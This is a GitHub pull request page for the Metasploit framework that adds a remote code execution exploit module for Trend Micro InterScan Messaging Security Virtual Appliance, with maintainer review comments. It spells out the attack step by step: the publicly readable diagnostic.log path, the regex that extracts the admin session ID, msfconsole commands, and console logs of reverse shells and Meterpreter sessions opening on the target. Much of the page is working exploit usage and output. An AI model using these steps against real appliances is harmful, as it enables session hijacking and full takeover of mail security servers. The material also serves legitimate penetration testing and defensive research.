Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Adding Trend Micro IMSVA Widget RCE module #9053

Merged
merged 3 commits into from Oct 10, 2017

Conversation

@mmetince
Copy link
Contributor

commented Oct 8, 2017

Fixes #8849
This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user.

Verification Steps

A successful check of the exploit will look like this:

  • Start msfconsole
  • use exploit/linux/http/trendmicro_imsva_widget_exec
  • Set RHOST
  • Set LHOST
  • Run check
  • Verify that you are seeing The target appears to be vulnerable.
  • Run exploit
  • Verify that you are seeing Awesome. JSESSIONID value in console.
  • Verify that you are getting Session with widget framework successfully initiated session.

Scenarios

msf > use exploit/linux/http/trendmicro_imsva_widget_exec
msf exploit(trendmicro_officescan_exec) > set RHOST 12.0.0.201
RHOST => 12.0.0.184
msf exploit(trendmicro_officescan_exec) > check
[*] 12.0.0.184:443 The target appears to be vulnerable.
msf exploit(trendmicro_officescan_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Extracting JSESSIONID from publicly accessible log file
[+] Awesome. JSESSIONID value = 0567E974AE729E58178C9B513FEBE41E
[*] Initiating session with widget framework
[+] Session with widget framework successfully initiated.
[*] Trigerring command injection vulnerability
[*] Command shell session 1 opened (12.0.0.1:4444 -> 12.0.0.201:44103) at 2017-10-08 18:05:11 +0300

pwd
/opt/trend/imss/UI/adminUI/ROOT/widget

A successful check of the exploit will look like this:

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/http/trendmicro_imsva_widget_exec`

This comment has been minimized.

Copy link
@h00die

h00die Oct 9, 2017

Contributor

s/windows/linux/

## Scenarios

```
msf > use exploit/windows/http/trendmicro_imsva_widget_exec

This comment has been minimized.

Copy link
@h00die

h00die Oct 9, 2017

Contributor

s/windows/linux/


```
msf > use exploit/windows/http/trendmicro_imsva_widget_exec
msf exploit(trendmicro_officescan_exec) > set RHOST 12.0.0.201

This comment has been minimized.

Copy link
@h00die

h00die Oct 9, 2017

Contributor

officescan or interscan?


register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the Trend Micro OfficeScan management interface', '/'])

This comment has been minimized.

Copy link
@h00die

h00die Oct 9, 2017

Contributor

officescan or interscan?

RHOST => 12.0.0.184
msf exploit(trendmicro_officescan_exec) > check
[*] 12.0.0.184:443 The target appears to be vulnerable.
msf exploit(trendmicro_officescan_exec) > exploit

This comment has been minimized.

Copy link
@h00die

h00die Oct 9, 2017

Contributor

officescan or interscan?

msf > use exploit/windows/http/trendmicro_imsva_widget_exec
msf exploit(trendmicro_officescan_exec) > set RHOST 12.0.0.201
RHOST => 12.0.0.184
msf exploit(trendmicro_officescan_exec) > check

This comment has been minimized.

Copy link
@h00die

h00die Oct 9, 2017

Contributor

officescan or interscan?

@h00die

This comment has been minimized.

Copy link
Contributor

commented Oct 9, 2017

im seeing no love on bind payloads, tested python/meterpreter/bind_tcp and python/meterpreter_bind_tcp
Looks like the others are working though

@h00die

This comment has been minimized.

Copy link
Contributor

commented Oct 9, 2017

no admin logged in

msf exploit(trendmicro_imsva_widget_exec) > set payload python/meterpreter/reverse_tcp
msf exploit(trendmicro_imsva_widget_exec) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Extracting JSESSIONID from publicly accessible log file
[+] Awesome. JSESSIONID value = E0F0B292796E4B197ACFAE95EA29E920
[*] Initiating session with widget framework
[-] Exploit aborted due to failure: no-access: Latest JSESSIONID is expired. Wait for sysadmin to login IMSVA
[*] Exploit completed, but no session was created.

with admin logged in

msf exploit(trendmicro_imsva_widget_exec) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Extracting JSESSIONID from publicly accessible log file
[+] Awesome. JSESSIONID value = 477D3B22D8A7ADC19EF33CA02ECF3E77
[*] Initiating session with widget framework
[+] Session with widget framework successfully initiated.
[*] Trigerring command injection vulnerability
[*] Sending stage (42231 bytes) to 2.2.2.2
[*] Meterpreter session 3 opened (1.1.1.1:4444 -> 2.2.2.2:48611) at 2017-10-09 12:00:16 -0400

meterpreter > sysinfo
Computer        : imvsa.home
OS              : Linux 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 22:55:16 UTC 2015
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux

@h00die h00die added the module label Oct 9, 2017

@h00die h00die self-assigned this Oct 9, 2017

'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'widget', 'repository', 'log', 'diagnostic.log')
})
if res && res.code == 200 && res.body.include?('JSEEEIONID')

This comment has been minimized.

Copy link
@wvu-r7

wvu-r7 Oct 9, 2017

Contributor

Did you mean JSESSIONID?

This comment has been minimized.

Copy link
@h00die

h00die Oct 9, 2017

Contributor

looking at my log file right now, it is JSEEEIONID

This comment has been minimized.

Copy link
@wvu-r7

wvu-r7 Oct 9, 2017

Contributor

wat

'uri' => normalize_uri(target_uri.path, 'widget', 'repository', 'log', 'diagnostic.log')
})
if res && res.code == 200 && res.body.include?('JSEEEIONID')
res.body.scan(/JSEEEIONID:([A-F0-9]{32})/).flatten.last

This comment has been minimized.

Copy link
@wvu-r7

wvu-r7 Oct 9, 2017

Contributor

And here?

This comment has been minimized.

Copy link
@h00die

h00die Oct 9, 2017

Contributor

looking at my log file right now, it is JSEEEIONID

This comment has been minimized.

Copy link
@wvu-r7

wvu-r7 Oct 9, 2017

Contributor

:(

@h00die

This comment has been minimized.

Copy link
Contributor

commented Oct 9, 2017

everythings looking good to me, spelling issues and bind shell are the only two issues i'm still seeing.

@h00die

This comment has been minimized.

Copy link
Contributor

commented Oct 9, 2017

@wvu-r7
https://1.1.1.1:8445/widget/repository/log/diagnostic.log

2017-10-09 19:09:32,619,DEBUG,null,null,[product_auth] JSEEEIONID:E0F0B292796E4B197ACFAE95EA29E920
2017-10-09 19:09:32,619,INFO,null,null,<br />
<b>Warning</b>: date(): It is not safe to rely on the system's timezone settings. You are *required* to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected the timezone 'UTC' for now, but please set date.timezone to select your timezone. in <b>/opt/trend/imss/UI/adminUI/ROOT/widget/lib/log4php/src/main/php/helpers/LoggerDatePatternConverter.php</b> on line <b>51</b><br /><br />
@mmetince

This comment has been minimized.

Copy link
Contributor Author

commented Oct 9, 2017

Going to clean up all the grammer issues once I'm finished with OfficeScan. Thanks for reviewing @h00die 👌 Could you please show me how to enable python/meterpreter/bind_tcp etc python binding payloads ?

@h00die

This comment has been minimized.

Copy link
Contributor

commented Oct 9, 2017

msf > use exploit/linux/http/trendmicro_imsva_widget_exec 
msf exploit(trendmicro_imsva_widget_exec) > set payload python/meterpreter/bind_tcp
payload => python/meterpreter/bind_tcp
msf exploit(trendmicro_imsva_widget_exec) > set verbose true
verbose => true
msf exploit(trendmicro_imsva_widget_exec) > set rhost 2.2.2.2
rhost => 2.2.2.2
msf exploit(trendmicro_imsva_widget_exec) > set lport 9870
lport => 9870
msf exploit(trendmicro_imsva_widget_exec) > check
[*] 2.2.2.2:8445 The target appears to be vulnerable.
msf exploit(trendmicro_imsva_widget_exec) > exploit

[*] Started bind handler
[*] Extracting JSESSIONID from publicly accessible log file
[+] Awesome. JSESSIONID value = 6F00D4F4EA864621DE853B81DEF8BCCC
[*] Initiating session with widget framework
[+] Session with widget framework successfully initiated.
[*] Trigerring command injection vulnerability
[*] Exploit completed, but no session was created.
@mmetince

This comment has been minimized.

Copy link
Contributor Author

commented Oct 9, 2017

I misunderstood the situation. Binds are not gonna work due because of default iptables rules on IMSVA. @h00die .

[root@imsva ~]# iptables --list
Chain INPUT (policy DROP)
target     prot opt source               destination         
ACCEPT     all  --  anywhere             anywhere            
ACCEPT     icmp --  anywhere             anywhere            
DROP       icmp --  anywhere             anywhere            icmp timestamp-request 
ACCEPT     all  --  anywhere             anywhere            state RELATED,ESTABLISHED 
ACCEPT     tcp  --  anywhere             anywhere            tcp dpt:8009 
ACCEPT     tcp  --  anywhere             anywhere            tcp dpt:8446 
ACCEPT     tcp  --  anywhere             anywhere            tcp dpt:8447 
ACCEPT     tcp  --  anywhere             anywhere            tcp dpt:8445 
ACCEPT     tcp  --  anywhere             anywhere            tcp dpt:ssh 
DROP       tcp  --  anywhere             anywhere            tcp dpt:rtsserv 
ACCEPT     tcp  --  12.0.0.201           anywhere            tcp dpt:domain 
ACCEPT     udp  --  12.0.0.201           anywhere            udp dpt:domain 
ACCEPT     tcp  --  12.0.0.201           anywhere            tcp dpt:sip 
ACCEPT     tcp  --  12.0.0.201           anywhere            tcp dpt:postgres 
ACCEPT     tcp  --  12.0.0.201           anywhere            tcp dpt:15505 
ACCEPT     tcp  --  12.0.0.201           anywhere            tcp dpt:ldap 
ACCEPT     tcp  --  12.0.0.201           anywhere            tcp dpt:15506 
ACCEPT     tcp  --  12.0.0.201           anywhere            tcp dpt:10040 
ACCEPT     tcp  --  anywhere             anywhere            tcp dpt:smtp 
ACCEPT     tcp  --  anywhere             anywhere            tcp dpt:pop3 

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
DROP       icmp --  anywhere             anywhere            icmp timestamp-reply 
@h00die

This comment has been minimized.

Copy link
Contributor

commented Oct 9, 2017

Had a feeling it was iptables or permissions.
I'm not actually sure how to specify reverse only, but I'm sure this isn't the first time that's been needee

@mmetince

This comment has been minimized.

Copy link
Contributor Author

commented Oct 9, 2017

Thanks to hdm on IRC (reference modules/exploits/osx/email/mailapp_image_exec.rb);

'Payload'        =>
        {
          'Compat'      =>
            {
              'ConnectionType' => '-bind',
            },
        },

I will add this when the module doesn't need other modification.

@h00die

This comment has been minimized.

Copy link
Contributor

commented Oct 9, 2017

w/ grammar being fixed, i think thats the last change that needs to happen for this to be good to go (afaik)

@h00die

This comment has been minimized.

Copy link
Contributor

commented Oct 10, 2017

saw your other comment deleted, is this ready for testing?

@mmetince

This comment has been minimized.

Copy link
Contributor Author

commented Oct 10, 2017

Yea yea, I was complaining about ConnectionType flag :-) But I've solved it in a ten second after writing the commen, thus I've deleted it.

We are good to go @h00die . It's ready imho.

@h00die h00die merged commit fb16f1f into rapid7:master Oct 10, 2017

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details
h00die added a commit that referenced this pull request Oct 10, 2017
@h00die

This comment has been minimized.

Copy link
Contributor

commented Oct 10, 2017

and one last time for good measure:

msf exploit(trendmicro_imsva_widget_exec) > show payloads

Compatible Payloads
===================

   Name                                 Disclosure Date  Rank    Description
   ----                                 ---------------  ----    -----------
   generic/custom                                        normal  Custom Payload
   generic/shell_reverse_tcp                             normal  Generic Command Shell, Reverse TCP Inline
   python/meterpreter/reverse_http                       normal  Python Meterpreter, Python Reverse HTTP Stager
   python/meterpreter/reverse_https                      normal  Python Meterpreter, Python Reverse HTTPS Stager
   python/meterpreter/reverse_tcp                        normal  Python Meterpreter, Python Reverse TCP Stager
   python/meterpreter/reverse_tcp_ssl                    normal  Python Meterpreter, Python Reverse TCP SSL Stager
   python/meterpreter/reverse_tcp_uuid                   normal  Python Meterpreter, Python Reverse TCP Stager with UUID Support
   python/meterpreter_reverse_http                       normal  Python Meterpreter Shell, Reverse HTTP Inline
   python/meterpreter_reverse_https                      normal  Python Meterpreter Shell, Reverse HTTPS Inline
   python/meterpreter_reverse_tcp                        normal  Python Meterpreter Shell, Reverse TCP Inline
   python/shell_reverse_tcp                              normal  Command Shell, Reverse TCP (via python)
   python/shell_reverse_tcp_ssl                          normal  Command Shell, Reverse TCP SSL (via python)

msf exploit(trendmicro_imsva_widget_exec) > set payload python/meterpreter_reverse_https 
payload => python/meterpreter_reverse_https
msf exploit(trendmicro_imsva_widget_exec) > show options

Module options (exploit/linux/http/trendmicro_imsva_widget_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      2.2.2.2    yes       The target address
   RPORT      8445             yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI of the Trend Micro IMSVA management interface
   VHOST                       no        HTTP server virtual host


Payload options (python/meterpreter_reverse_https):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   LHOST             1.1.1.1    yes       The local listener hostname
   LPORT             8443             yes       The local listener port
   LURI                               no        The HTTP Path
   PayloadProxyHost                   no        The proxy server's IP address
   PayloadProxyPort  8080             yes       The proxy port to connect to


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(trendmicro_imsva_widget_exec) > set lport 8987
lport => 8987
msf exploit(trendmicro_imsva_widget_exec) > exploit

[*] Started HTTPS reverse handler on https://1.1.1.1:8987
[*] Extracting JSESSIONID from publicly accessible log file
[+] Awesome. JSESSIONID value = 6F00D4F4EA864621DE853B81DEF8BCCC
[*] Initiating session with widget framework
[-] Exploit aborted due to failure: no-access: Latest JSESSIONID is expired. Wait for sysadmin to login IMSVA
[*] Exploit completed, but no session was created.
msf exploit(trendmicro_imsva_widget_exec) > exploit

[*] Started HTTPS reverse handler on https://1.1.1.1:8987
[*] Extracting JSESSIONID from publicly accessible log file
[+] Awesome. JSESSIONID value = 713E07C537DE358A47A300DDE4D104F7
[*] Initiating session with widget framework
[+] Session with widget framework successfully initiated.
[*] Trigerring command injection vulnerability
[*] https://1.1.1.1:8987 handling request from 2.2.2.2; (UUID: hrekqtbt) Redirecting stageless connection from /K3RFyy_CzZGCr5e723LUEwiSbaS8b_UWGRdHMfuJO9LJyzfzO0XCA6E8Bwo with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://1.1.1.1:8987 handling request from 2.2.2.2; (UUID: hrekqtbt) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (1.1.1.1:8987 -> 2.2.2.2:41863) at 2017-10-10 19:24:44 -0400
pwd

meterpreter > pwd
/opt/trend/imss/UI/adminUI/ROOT/widget

@h00die

This comment has been minimized.

Copy link
Contributor

commented Oct 10, 2017

Release Notes

This PR adds an auth bypass (log file read for session stealing) and command execution exploit against Trend Micro's InterScan Messaging Security (Virtual Appliance)

@h00die

This comment has been minimized.

Copy link
Contributor

commented Oct 10, 2017

@mmetince thanks for the submission, it was pretty solid from the start so easy to test!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
3 participants
You can’t perform that action at this time.